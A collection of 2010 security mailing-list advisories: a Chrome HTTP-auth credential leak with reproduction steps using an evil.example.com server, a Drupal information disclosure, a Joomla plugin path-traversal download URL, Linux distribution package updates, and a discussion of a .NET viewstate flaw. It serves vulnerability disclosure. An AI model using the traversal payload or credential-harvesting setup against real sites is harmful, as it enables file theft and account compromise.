from a third-party site. If an attacker had control of the third-party web server, he could request credentials from the user via HTTP authentication. This style of attack has been documented in the past, and some of variations on this theme are explored in a recent paper by VSR [5]. However, in the case of vulnerable versions of Google Chrome, the password manager may pre-fill the authentication dialog box with credentials intended for parent page's domain, leaving users one click away from account compromise. This issue would affect Chrome users which use applications that allow users to embed objects from third parties. Examples of such applications may include message boards, blogs, or social networking sites. The following steps may be used to reproduce the issue: 1. Set up an HTML page with the following contents: http://evil.example.com/image.png"; /> This page should not be protected by any authentication and should be hosted at: http://victim.example.org/test-img.html 2. Set up an HTTP digest protected area under the following URL: http://victim.example.org/private/ 3. Set up the attacker's server to be protected by HTTP authentication such that the following URL is protected: http://evil.example.com/image.png 4. Use Google Chrome to log in to an area protected with HTTP authentication, such as: http://victim.example.org/private Save the password in the password manager. 5. Finally, access the unauthenticated HTML page on the victim's server: http://victim.example.org/test-img.html Since the embedded image requires authentication, a password prompt should appear. In vulnerable versions of Google Chrome, this form will be pre-filled with the stored credentials from the victim.example.org domain, even though the password prompt is generated by evil.example.com. Versions Affected - The issue was originally discovered in version 3.0.195.38 and was also verified to exist in version 4.0.249.78. Testing was conducted on the Windows platform. Vendor Response --- The following timeline details Google's response to the reported issue: 2010-01-20VSR submitted a security bug report [3]. Chromium development team began researching the issue. 2010-01-21VSR provided additional details on the test scenario. Chromium developers successfully reproduced the issue and committed a fix to the source repository [4]. 2010-02-10Chrome stable version 4.0.249.89 released which includes the fix. 2010-02-15VSR advisory released. Recommendation -- Upgrade to the latest version of Google Chrome as soon as possible. Users are advised to be wary of HTTP authentication prompts and to carefully inspect the domains presented in these messages to see if they match the domain of the expected site. Common Vulnerabilities and Exposures (CVE) Information -- The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2010-0556 to this issue. This is a candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Acknowledgements Thanks to the Chromium development team for the prompt response. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. htt
Information disclosure vulnerability in Drupal's Realname User Reference Widget contributed module (version 6.x-1.0)
Information disclosure vulnerability in Drupal's Realname User Reference Widget contributed module (version 6.x-1.0) Discovered by Martin Barbella Description of Vulnerability: - Drupal is a free software package that allows an individual or a community of users to easily publish, manage and organize a wide variety of content on a website (http://drupal.org/about). The Realname CCK User Reference Widget module adds a new widget to the User Reference CCK field type that uses the Realnames for autocompletion (http://drupal.org/project/realname_userreference). Only the access content permission is needed to access the page which displays the user names and real names for users, used by the autocompletion widget, resulting in an information disclosure vulnerability. Systems affected: - This has been confirmed in version 6.x-1.0 of the Realname User Reference Widget module. Impact: --- This would allow an attacker to collect user names for brute force attacks, or real names of users for targeted phishing. Mitigating factors: --- A user must have the access content permission to exploit this vulnerability, though in most cases even anonymous users would have this permission. Proof of concept: - 1. Install the module and its dependencies 2. Configure Realname 3. As any user with access content, visit realnameuserreference/autocomplete or realnameuserreference/autocomplete/ 4. Note that real names and usernames can be gathered from the output Timeline: - 2010-02-01 - Drupal Security notified 2010-02-16 - Still no response from Drupal Security 2010-02-16 - Public disclosure
[USN-900-1] Ruby vulnerabilities
=== Ubuntu Security Notice USN-900-1 February 16, 2010 ruby1.9 vulnerabilities CVE-2009-1904, CVE-2009-4124, CVE-2009-4492 === A security issue affects the following Ubuntu releases: Ubuntu 8.10 Ubuntu 9.04 Ubuntu 9.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.10: libruby1.9 1.9.0.2-7ubuntu1.3 ruby1.9 1.9.0.2-7ubuntu1.3 Ubuntu 9.04: libruby1.9 1.9.0.2-9ubuntu1.2 ruby1.9 1.9.0.2-9ubuntu1.2 Ubuntu 9.10: libruby1.9 1.9.0.5-1ubuntu1.2 ruby1.9 1.9.0.5-1ubuntu1.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Emmanouel Kellinis discovered that Ruby did not properly handle certain string operations. An attacker could exploit this issue and possibly execute arbitrary code with application privileges. (CVE-2009-4124) Giovanni Pellerano, Alessandro Tanasi, and Francesco Ongaro discovered that Ruby did not properly sanitize data written to log files. An attacker could insert specially-crafted data into log files which could affect certain terminal emulators and cause arbitrary files to be overwritten, or even possibly execute arbitrary commands. (CVE-2009-4492) It was discovered that Ruby did not properly handle string arguments that represent large numbers. An attacker could exploit this and cause a denial of service. This issue only affected Ubuntu 9.10. (CVE-2009-1904) Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/ruby1.9_1.9.0.2-7ubuntu1.3.diff.gz Size/MD5:55028 348a5acc2d4cd7140db6e559b61dcd65 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/ruby1.9_1.9.0.2-7ubuntu1.3.dsc Size/MD5: 1772 d97af9578cccd57bd0478b24c4a15bbd http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/ruby1.9_1.9.0.2.orig.tar.gz Size/MD5: 6407910 2a848b81ed1d6393b88eec8aa6173b75 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/irb1.9_1.9.0.2-7ubuntu1.3_all.deb Size/MD5:57858 469d331bfeb1828bcb883681a7644e57 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/rdoc1.9_1.9.0.2-7ubuntu1.3_all.deb Size/MD5: 112270 146debd3794502eaf8e150c4f4d7e4c0 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/ri1.9_1.9.0.2-7ubuntu1.3_all.deb Size/MD5: 972126 e38db5ccb627c08fa6218f8c2eeb10fa http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/ruby1.9-elisp_1.9.0.2-7ubuntu1.3_all.deb Size/MD5:31506 2a605b2bea6de3c30cb7a663e08e8c05 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/ruby1.9-examples_1.9.0.2-7ubuntu1.3_all.deb Size/MD5:64772 207c3c3409a49b341b5e9a2616fa7641 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/libruby1.9-dbg_1.9.0.2-7ubuntu1.3_amd64.deb Size/MD5: 2114692 67f4ca5d88d85feeefe632e850e16eff http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/libruby1.9_1.9.0.2-7ubuntu1.3_amd64.deb Size/MD5: 2276448 8f1a9b613c078ba0b74ef8f0a3e4f826 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/ruby1.9-dev_1.9.0.2-7ubuntu1.3_amd64.deb Size/MD5: 943466 4180d671414cdedbe170ab4709448a50 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/ruby1.9_1.9.0.2-7ubuntu1.3_amd64.deb Size/MD5:26530 5ba45139014fd73a573e0759c56b1008 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/libdbm-ruby1.9_1.9.0.2-7ubuntu1.3_amd64.deb Size/MD5:12556 3e1f3dc7bd6fa475f8f982b6ce5e690f http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/libgdbm-ruby1.9_1.9.0.2-7ubuntu1.3_amd64.deb Size/MD5:11838 fbce05244095fd098d2296038166cf2d http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/libopenssl-ruby1.9_1.9.0.2-7ubuntu1.3_amd64.deb Size/MD5: 134348 8ec8a5fbdaebd9e3a6be2d6a3d929418 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/libreadline-ruby1.9_1.9.0.2-7ubuntu1.3_amd64.deb Size/MD5:11650 c359b94a5b795e208ffdf3c4678f44cd http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.9/libtcltk-ruby1.9_1.9.0.2-7ubuntu1.3_amd64.deb Size/MD5: 1745694 f5932e13af1f755fe4c8b2006ff79d76 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/libruby1.9-dbg_1.9.0.2-7ubuntu1.3_i386.deb Size/MD5: 1921832 35049ad6802242d7b15a612c8e1c49b7 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.9/libruby1.9_1.9.0.2-7ubuntu1.3_i386.deb Size/MD5: 2128332 732aea07d60e5d51b109ab1ec9255841 http://s
[ MDVSA-2010:037 ] fetchmail
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:037 http://www.mandriva.com/security/ ___ Package : fetchmail Date: February 16, 2010 Affected: 2010.0 ___ Problem Description: A vulnerability have been discovered and corrected in fetchmail: The sdump function in sdump.c in fetchmail 6.3.11, 6.3.12, and 6.3.13, when running in verbose mode on platforms for which char is signed, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via an SSL X.509 certificate containing non-printable characters with the high bit set, which triggers a heap-based buffer overflow during escaping (CVE-2010-0562). This update provides fetchmail 6.3.14, which is not vulnerable to this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0562 http://www.fetchmail.info/fetchmail-SA-2010-01.txt ___ Updated Packages: Mandriva Linux 2010.0: d8d72bfeb0a3f4db1760728f495a2de9 2010.0/i586/fetchmail-6.3.14-0.1mdv2010.0.i586.rpm b58db1070a6efcd9d28ffc89f66b544c 2010.0/i586/fetchmailconf-6.3.14-0.1mdv2010.0.i586.rpm b794d75bdab692813b345f32a9969658 2010.0/i586/fetchmail-daemon-6.3.14-0.1mdv2010.0.i586.rpm f8be812911fb7f7042b981e8c2ad1094 2010.0/SRPMS/fetchmail-6.3.14-0.1mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: b56fed87fa44e6d446be4135b322e9d3 2010.0/x86_64/fetchmail-6.3.14-0.1mdv2010.0.x86_64.rpm 6d8d033e916b62f700e68b27d55e0c5b 2010.0/x86_64/fetchmailconf-6.3.14-0.1mdv2010.0.x86_64.rpm 09b165f3e522197967d5b05317a1d92e 2010.0/x86_64/fetchmail-daemon-6.3.14-0.1mdv2010.0.x86_64.rpm f8be812911fb7f7042b981e8c2ad1094 2010.0/SRPMS/fetchmail-6.3.14-0.1mdv2010.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLemFtmqjQ0CJFipgRArz6AJ9tQaqkzAvzTZlgtT9BIFJFE6SD1QCeMU9r vxGTHsLKs6WOax3plmPFSGQ= =7tik -END PGP SIGNATURE-
Joomla (Jw_allVideos) Remote File Download Vulnerability
# # Securitylab.ir # # Application Info: # Name: Joomla (jw_allvideos Plugin) # Version: 1.0 # # Vulnerability Info: # Type: Remote File Download # Risk: Medium # # Vulnerability: # http://site.com/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php # # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com ###
[SECURITY] [DSA-1997-1] New mysql-dfsg-5.0 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1997-1 secur...@debian.org http://www.debian.org/security/Giuseppe Iuculano February 14, 2010 http://www.debian.org/security/faq - Package: mysql-dfsg-5.0 Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2009-4019 CVE-2009-4030 CVE-2009-4484 Several vulnerabilities have been discovered in the MySQL database server. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-4019 Domas Mituzas discovered that mysqld does not properly handle errors during execution of certain SELECT statements with subqueries, and does not preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement. CVE-2009-4030 Sergei Golubchik discovered that MySQL allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified DATA DIRECTORY or INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL data home directory. CVE-2009-4484 Multiple stack-based buffer overflows in the CertDecoder::GetName function in src/asn.cpp in TaoCrypt in yaSSL before 1.9.9, as used in mysqld, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption and daemon crash) by establishing an SSL connection and sending an X.509 client certificate with a crafted name field. For the oldstable distribution (etch), these problems have been fixed in version 5.0.32-7etch12 For the stable distribution (lenny), these problems have been fixed in version 5.0.51a-24+lenny3 The testing (squeeze) and unstable (sid) distribution do not contain mysql-dfsg-5 anymore. We recommend that you upgrade your mysql-dfsg-5.0 packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian (oldstable) - -- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch12.dsc Size/MD5 checksum: 1128 4887f5693757fbbc2584e86ab5e91bf3 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch12.diff.gz Size/MD5 checksum: 315292 3d1c00f7b70032c11803fa391bee026a http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32.orig.tar.gz Size/MD5 checksum: 16439441 f99df050b0b847adf7702b44e79ac877 Architecture independent packages: http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server_5.0.32-7etch12_all.deb Size/MD5 checksum:48912 f937a118691e4325dac3a5a8e98eeb50 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-common_5.0.32-7etch12_all.deb Size/MD5 checksum:55892 6f34fbec1b8e451172ebd24f80439a9e http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client_5.0.32-7etch12_all.deb Size/MD5 checksum:46842 daa1649e464ebdbbd54170fb571782ea alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_alpha.deb Size/MD5 checksum: 1947910 6e23852721ab3b2a95d1b3113a533212 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_alpha.deb Size/MD5 checksum:48900 c53c847af88a0423a09b9f68ba261859 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_alpha.deb Size/MD5 checksum: 8906528 64427684814af516902d10adb5c85de2 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_alpha.deb Size/MD5 checksum: 8406242 204adae2eab5bfb665728ea7257631f0 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_alpha.deb Size/MD5 checksum: 27248640 ee4b566619b0e560dcbf0632f8b0cc0e amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_amd64.deb Size/MD5 ch
RE: Trustwave's SpiderLabs Security Advisory TWSL2010-001
I respectfully defend our statement as very realistic. The .Net exploit
provided in the advisory is all that is required to work; no code-behind is
required because the vulnerability related to "innerhtml" lies in the .Net
code.
The specific flaw is actually in
System.Web.UI.HTMLControls.HtmlContainerControl class, which is the super class
of the HTMLForm control (among others). The bug is easy to spot in the
LoadViewState method as revealed in .Net Reflector:
protected override void LoadViewState(object savedState)
{
if (savedState != null)
{
base.LoadViewState(savedState);
string text = (string) this.ViewState["innerhtml"];
if (text != null)
{
this.Controls.Clear();
this.Controls.Add(new LiteralControl(text));
}
}
}
For those not familiar with C#, the .Net class takes the "innerhtml" value from
the view state and adds it as a LiteralControl (basically literal HTML) in its
"Controls" collection. When the HtmlContainerControl object is rendered, it
will take that LiteralControl and place HTML directly into the response body.
The other .Net-defined subclasses of HtmlContainerControl are listed below:
HtmlAnchor
HtmlButton
HtmlGenericControl
HtmlHead
HtmlSelect
HtmlTable
HtmlTableCell
ListViewTableCell
HtmlTableRow
ListViewTableRow
HtmlTextArea
There are other .Net controls that take properties from the view state that may
also be vulnerable. Enumerating them is not very helpful because the solution
will always be the same: secure the view state.
Regarding the articles you linked to, I am familiar with Scott Mitchell's. It
is a great document, but the vulnerabilities he references have to do with
custom use of the view state, not specific flaws inherent in the .Net view
state. As we mentioned in the advisory, technically this is a known issue in
.Net, although a proof of concept attack against the framework has (to our
knowledge) not been documented before.
I've also read Michal Zalewski's advisory. It stands out as (I think) the first
specific attacks documented against .Net's view state. However, they are of a
different nature than the attack documented in our advisory.
Sacha Faust's post on encoding controls is a useful reference, but isn't
directly relevant to view state attacks. The list is of properties that will
automatically HTML encode when the programmer sets the value. This isn't
necessarily the same as when the value is set in the view state.
Thanks,
David Byrne
Senior Security Consultant
Trustwave - SpiderLabs, Application Security
Email: dby...@trustwave.com
-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Chris Weber
Sent: Thursday, February 11, 2010 3:43 PM
To: Trustwave Advisories; webapp...@lists.securityfocus.com;
websecur...@webappsec.org; full-disclos...@lists.grok.org.uk;
bugtraq@securityfocus.com
Subject: [Full-disclosure] (resend) RE: [WEB SECURITY] Trustwave's SpiderLabs
Security Advisory TWSL2010-001
The key part of the advisory for me wasn't VIEWSTATE as much as it was the
controls, but this statement you made seemed pretty outrageous (with regard to
ASP.NET):
'These vulnerabilities show that unsigned client-side viewstates will ALWAYS
result in a vulnerability in the affected products.'
I would disagree - it depends how the software developer implemented use of the
VIEWSTATE's content. In ASP.NET, the interesting part here was that you
appeared to be controlling an innerhtml property of a Form control through the
VIEWSTATE. What your example didn't show, I'm assuming, is some code behind
that pulled out the and set the value in the form's innerHtml
property/attribute. That's just dangerous coding, akin to trusting client-side
input and no different than acting on client input that came from any method,
form input, JSON, etc. Your repro was a bit confusing/misleading without that
part. Otherwise, were you saying that some controls inherently populate their
properties/attributes from VIEWSTATE content automagically?
There have been past discussions on VIEWSTATE's security:
Scott Mitchell documented tampering VIEWSTATE in a 2004 article:
http://msdn.microsoft.com/en-us/library/ms972976.aspx#viewstate_topic12
Michal Zalewski reported some exploit scenarios with replay and DoS through
VIEWSTATE.
http://seclists.org/bugtraq/2005/May/27
You made a reference to how other controls are also vulnerable to this attack.
I think that data would be more useful in the advisory.
Yes there do exist ASP.NET controls which don't properly encode, and I would
refer readers to Sacha Faust's FxCop rule which finds those dangerous controls:
http://blogs.msdn.com/sfaust/archive/2008/09/18/fxcop-htmlspotter-spotting-asp-net-xss-using-fxcop-and-html-enco
[ MDVSA-2010:036 ] webmin
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:036 http://www.mandriva.com/security/ ___ Package : webmin Date: February 12, 2010 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: This advisory updates webmin to the latest version 1.500, fixing several bugs and a cross-site scripting issue which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors (CVE-2009-4568). Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4568 https://qa.mandriva.com/27789 https://qa.mandriva.com/57313 ___ Updated Packages: Mandriva Linux 2008.0: b88f1d3028ca388871749239e3e79cea 2008.0/i586/webmin-1.500-0.1mdv2008.0.noarch.rpm 34a5855e42db94562e5c761eafc670b2 2008.0/SRPMS/webmin-1.500-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 2d5291bb5442c731df295dd3069a0992 2008.0/x86_64/webmin-1.500-0.1mdv2008.0.noarch.rpm 34a5855e42db94562e5c761eafc670b2 2008.0/SRPMS/webmin-1.500-0.1mdv2008.0.src.rpm Mandriva Linux 2009.0: 66f4e3022e6a29251a2eb168ffc6a8f2 2009.0/i586/webmin-1.500-0.1mdv2009.0.noarch.rpm c4409738f348158e2ce658d0a15d7ec4 2009.0/SRPMS/webmin-1.500-0.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 787357fee03e87c947950a81810cd144 2009.0/x86_64/webmin-1.500-0.1mdv2009.0.noarch.rpm c4409738f348158e2ce658d0a15d7ec4 2009.0/SRPMS/webmin-1.500-0.1mdv2009.0.src.rpm Mandriva Linux 2009.1: 6223395569561fb4b6a672845cb8b65b 2009.1/i586/webmin-1.500-0.1mdv2009.1.noarch.rpm cf4acdf1d4f59dd6ab9aabb5b788eb27 2009.1/SRPMS/webmin-1.500-0.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: b0d876823caf79b95a4d305f84c42a2f 2009.1/x86_64/webmin-1.500-0.1mdv2009.1.noarch.rpm cf4acdf1d4f59dd6ab9aabb5b788eb27 2009.1/SRPMS/webmin-1.500-0.1mdv2009.1.src.rpm Mandriva Linux 2010.0: 1e3ffa22a40379a6f118f30119240e8e 2010.0/i586/webmin-1.500-0.1mdv2010.0.noarch.rpm 2e88506b60faa5223e70b3585df61eb8 2010.0/SRPMS/webmin-1.500-0.1mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: de1a0b9c0235b41883d687aa5fd0350a 2010.0/x86_64/webmin-1.500-0.1mdv2010.0.noarch.rpm 2e88506b60faa5223e70b3585df61eb8 2010.0/SRPMS/webmin-1.500-0.1mdv2010.0.src.rpm Corporate 4.0: 6d07714084dc6e0875611caddfdf246a corporate/4.0/i586/webmin-1.500-0.1.20060mlcs4.noarch.rpm 70112c7ab9c9daf264e4b3323205ce62 corporate/4.0/SRPMS/webmin-1.500-0.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 1b4c25195e933099b2600c1355640ed0 corporate/4.0/x86_64/webmin-1.500-0.1.20060mlcs4.noarch.rpm 70112c7ab9c9daf264e4b3323205ce62 corporate/4.0/SRPMS/webmin-1.500-0.1.20060mlcs4.src.rpm Mandriva Enterprise Server 5: b581fd765d6a315b4e4a8b0b7b28a900 mes5/i586/webmin-1.500-0.1mdvmes5.noarch.rpm e567172b5df7af353b6c58d9e49458cd mes5/SRPMS/webmin-1.500-0.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: 7c49770e4de6369281ede8c9e0c1d7ce mes5/x86_64/webmin-1.500-0.1mdvmes5.noarch.rpm e567172b5df7af353b6c58d9e49458cd mes5/SRPMS/webmin-1.500-0.1mdvmes5.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLdZUjmqjQ0CJFipgRAixXAKDLbMOL8yCg4XbXMaMJEnWRDSttfACeNEqf E9bqunCxP3hQrWj0XGnsOlc= =+mw5 -END PGP SIGNATURE-
